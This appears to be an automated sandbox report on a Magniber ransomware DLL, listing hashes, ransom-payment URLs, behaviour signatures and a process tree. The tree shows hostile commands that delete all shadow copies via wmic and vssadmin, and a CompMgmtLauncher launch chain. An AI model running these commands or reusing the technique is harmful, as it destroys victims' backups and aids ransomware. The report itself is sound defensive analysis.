Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
-
submitted
24-08-2024 08:37
General
-
Target
be3c7d928663380e88f3fb97bb17b2da_JaffaCakes118.dll
-
Size
20KB
-
MD5
be3c7d928663380e88f3fb97bb17b2da
-
SHA1
ebaed1467dc8f6b80c5f8bf0a596525979ea2825
-
SHA256
c070f4e29d6d33432b484bfba03b6d66eda0befda54600cb6d4fda4de27a44df
-
SHA512
6d7a286fa2c18fd0fc364d3a8b05538dec250887fb965cd3ce28747e8cfe2334ff8b88ddc03532e83ee804c5ac77a502b080a63a0f1b2a4468cb18b323b90017
-
SSDEEP
384:dLck6pO6NPXcNSHHNGopa6RmR2VZNtEK8H7TqeuB5xtfRlhrrYkQMeg75lb:Fv67u4HHEV6RmgNtEKReuB5xtffhrrY6
Malware Config
Extracted
C:\Users\Admin\Pictures\readme.txt
magniber
http://7280f6a8ae908810b2zmmmgwfp.zokkkgngjqrnmiv3gbm3xcflq2bfgoji7uvyrig6ds2ufrv45jcenzyd.onion/zmmmgwfp
http://7280f6a8ae908810b2zmmmgwfp.sonwear.quest/zmmmgwfp
http://7280f6a8ae908810b2zmmmgwfp.fewacts.space/zmmmgwfp
http://7280f6a8ae908810b2zmmmgwfp.refersa.casa/zmmmgwfp
http://7280f6a8ae908810b2zmmmgwfp.asmoral.site/zmmmgwfp
Signatures
-
Detect magniber ransomware 1 IoCs
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (64) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Drops desktop.ini file(s) 5 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Interacts with shadow copies 3 TTPs 10 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Modifies Internet Explorer settings 1 TTPs 34 IoCs
-
Modifies registry class 13 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious behavior: MapViewOfSection 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 5 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of UnmapMainImage 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\cmd.execmd /c "start http://7280f6a8ae908810b2zmmmgwfp.sonwear.quest/zmmmgwfp^&2^&48611187^&64^&319^&12"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://7280f6a8ae908810b2zmmmgwfp.sonwear.quest/zmmmgwfp&2&48611187&64&319&123⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1276 CREDAT:275457 /prefetch:24⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
-
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\be3c7d928663380e88f3fb97bb17b2da_JaffaCakes118.dll,#12⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵
-
-
-
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
-
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Drops desktop.ini file(s)
- Modifies registry class
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
342B
MD50671272679b644e8501f2c53e9c299b7
SHA1f180278cbbfaa440d403d7c329300c2646ab33c5
SHA2561bb3da06eb188f4fc265da1dc203f68b888e7537a150bcc9aac06ac593fa3fac
SHA5120e3566340ac4ba2f369e1a198642b6736ae913d1d3b371d725f844a5658cd6f4c1cc54284bddef9f591cb276bb4e65c3625271d350259254e9804601ff269302
-
Filesize
342B
MD5bef2a84a1df246081566e6c763f5489e
SHA1fc03706dd29e13b4ed1f31ac4bedd6adc0445868
SHA256eb6d1c55beac3c0d49962b06dbd30bccdb73a3ff25a89efb37170b868bddd363
SHA5125cbda97a7abaf7434f8f9712ea62cd3d3fb285286286a275ae8c4a41dc74e1cb799599f31545e998dca7c5812544652331d60139a113cabd3c02a26ef67c9d66
-
Filesize
342B
MD54cda27509f66e2169afde12ed1e80bed
SHA14a0debe76d76cbe7054a9280bdcb41eff319f443
SHA25696a32ba1e40a3bc9471d64c4f231b05769c0bd39a5402b190062cf01cf616ee4
SHA512f3a8e21303927532579a83127828ef9baf126ca75396b58d7e3b2944a30e6970c6d298807691f6aa2e3a3f72175c8b5e45c41d04ff5e472cf0e581f471dd7450
-
Filesize
342B
MD5178cd7de6a862c2338441578e53a4a8b
SHA1b60ec06a455ae8c3de5ede7776c1e60528c6058c
SHA256209a19430e5191b03f5627c00baf4b901fc59aab6a51c1ced8edcb4511368832
SHA512d655f6d991f5426ce15a9b8d651779f857b6a53a54c7aeff0147c67d5da75ac90e779b5b5c6d676cba7eb21810b45b2d909e0e292e0398b68d5c1113a1944714
-
Filesize
342B
MD5b1df5e92bf0626aa79323f9afac96f99
SHA11b6637a7ff1884ad3d375f6caff1e3ae3bfca38a
SHA256049fb67573e8e8de788eaa0dd3f7fd5581a42e008a80bb9e5bace1b69a1bcc75
SHA512ad225d3d78773c7eed88f1777d30f59076068069589eb178b1cc89188acf6438e71df60fe92d30683ceeb39c361e9209c7b3a43391b817817bc40c82d9d776a0
-
Filesize
342B
MD55b6cb2fcd00ca565b4017733e5d64712
SHA14de68c6210417aff9e8d1e8bcf065f4e4e179c3f
SHA256a9054d1b71175bf4d7d702351d50c96d34a7611c554f97257bc0109542754307
SHA5125c703ea1027eb3efcbcd116991848d84540ffd23098e711ed1b719b5b3a5a561b72a9c3065b48182a3b90281e753fcead6d40c724c3a686c5f633e242a8c71f7
-
Filesize
342B
MD5107bee16dcd1a8e745e510b990bd0473
SHA186dd4f7e8413ead1b59e9d605237a760f0add2ce
SHA2561c7779f3eabc086c6b27a14ff12043da0b75aee8b5d91faf023850d2bb734884
SHA512d6b1c58ba06441b4e665262eaf340fa375d62302026f2e71e2a6df872ec782aafae225280331d15581aa9e369b9cc2992d056501855cce011b7249f7e59bc0a2
-
Filesize
342B
MD5ee9d1abe8e41dc199fbe4a7cd3d004df
SHA12dd8450fcb22697a8d78a6b9dff5a26000fdc172
SHA256566e49d33f196d15f5ed366e32238423283113d91e470d6a61913c50df57a656
SHA5125c64ccc2568dfe0bf84f033c59dd931ec7e16d8f341bf2b08b136bb46bb74756aa6e9b3b68fcf78ed7f2181efa5e800e16232ac75be13026b724fe1e112b6881
-
Filesize
342B
MD54d42231a6aab58677b21ad6924957035
SHA11942194cf9519ad190ddbb11a8bb0ea8a821ac09
SHA256f5aee0c407f2d689ce07356dd81895e71b001f9bfb469015a57454413936568b
SHA512aab91216be0d7532abde8ddc93d804bdfdfbcedcf32d93217f83ac50322630e120507908cdb51303dfa09035a59449f25cd84691518da2106a254aef97b44731
-
Filesize
342B
MD538d83060c2319f1a4162b92c001c6005
SHA1287b3e934208b0ebe655b20616b2bfb14fac7e0d
SHA256228df316d73ca625ed10bda93cd0b2107c9d95b7f1ccf2f6f622a681a6de4cdd
SHA5126171cc190a6a84ba8a0b9e58f931c64e7029007fb58b4a146267e9f3f50ab4b67ce6c7ebdbeba1dde96a051f13975b9a7bf30bc8dac3c48f09a0ecda6541903f
-
Filesize
342B
MD5ba6cc6a831949b09a29dd870b4373263
SHA1f8ddc3b875350b28d23741b19780f0d6616143ae
SHA256e82f99c1c1d78599a821742708712ff5bd476169bbfe2ea7cb7433867e9800bd
SHA5127d9286d6dc7c08fc15e8a26a8d8476833d5537199e10372859873491a2d6fe3ee62b8433e339ca31568eac7ea31a8e41b583e24cf8c4c3eac61f986a85c058e7
-
Filesize
342B
MD525a7aa2174dfe286f48b203d495a53a7
SHA1ec3da1842bb17286b6c0287f792e21ca3377bb0c
SHA256af4637c7cab0690fda7e00fb585e4f651b9c7551333c0543a6d340731449e3c4
SHA512a2770af237a3378eb409eb77eefc7ca3015e4c209d45a083e95162a1968943f6eefde9118f7e79167145e32b4078551d42162f991ce0397e4f3fa4087f124ecc
-
Filesize
342B
MD57e8b9f211663ebadd82f4e2e402cb98a
SHA123412abc35fa9362a9b9c99af2569e069e6e0884
SHA2564afbbe01a97c41dfdd926738655521095efee25dd7b24f882e69c1c8021dc6b0
SHA5124f363fcd219069ee4225b8c7498b4d7c1b798c7240f719d42bdf7836a7b4429653dc092d7842ad07368674035d9499fba0b5fae949e71561a85e57e8c0cc2eeb
-
Filesize
342B
MD5bf6d2b8f00ea28a1ba10d7f7935459e0
SHA199958aa2399841a1163174a31834ae1178e8e31c
SHA256989c3a7a790186dfce4cd3b79bd91c97bd3e6d5a006776e6676a03688d59c36f
SHA512cc1b18c957c930a276bf381b8595e6ff00d331889cd62c157fea94a39503f9126f1e6d3ee9cec1826dc3b0842a844f9ddd840ca60a1b16c9c531bf55ed56f0b6
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
1KB
MD578e005dff6e89c5f2be9d4f8cb0ae8e0
SHA1158fd87a283362b47e0b53ae4baad27656b7061e
SHA25630bef6202375db1c22692b1e319289afad217d387537823493a277347d3ab556
SHA512fded52df63a18ac15a8ac3d6d453f33a1cb6030ad598ea175773edf68a9be0673193edb14b98e5c1015da145d8b003c5e04dcb60eaa73f2f2c5b9ad20893a67e
-
Filesize
20KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
3.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB